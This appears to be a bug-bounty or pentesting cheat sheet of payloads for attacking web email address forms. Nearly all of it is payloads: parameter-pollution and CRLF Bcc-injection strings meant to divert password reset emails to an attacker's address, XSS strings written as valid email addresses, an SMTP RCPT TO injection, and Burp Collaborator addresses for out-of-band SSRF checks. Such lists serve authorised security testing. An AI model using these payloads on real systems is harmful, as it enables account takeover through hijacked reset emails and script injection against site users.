# Email Address Forms

## Email Address Form Payloads

The following payloads can be used when attempting to exploit an email address form

### **Param Manipulation and CRLF Injection**

Use these payloads to try and force the web application to send legitimate password reset emails and such, to a email address you control:

* email=<user@lol.com>&<test@test.com>
* email=<user@lol.com>%<26test@test.com>
* email=<user@lol.com>;<test@test.com>
* email=<user@lol.com>, <test@test.com>
* {”email”:”<user@lol.com>”,”<test@test.com>”}
* {”email”:\[”<user@lol.com>”,”<test@test.com>”]}
* email=<user@lol.com>%0D%0ABcc:<test@test.com>
* email=<user@lol.com>%0ABcc:<test@test.com>
* email=<user@lol.com>%0DBcc:<test@test.com>
* email=<user@lol.com>\r\nBcc:<test@test.com>
* email=<user@lol.com>\nBcc:<test@test.com>
* email=<user@lol.com>\rBcc:<test@test.com>

### **Other checks (XSS, SSRF, SMTP Manipulation)**

Use these payloads (which are all valid email addresses according to the RFC) to find other issues.

* \<svg/onload=alert('XSS')>@test.com
* test\@test(\<svg/onload=alert('XSS')>).com&#x20;
* "\<svg/onload=alert('XSS')>"@test.com
* "<test@gmail.com>\r\nRCPT TO:\<victim+"@test.com>
* <test@burpcollab.com>
* test@\[burpcollab.com]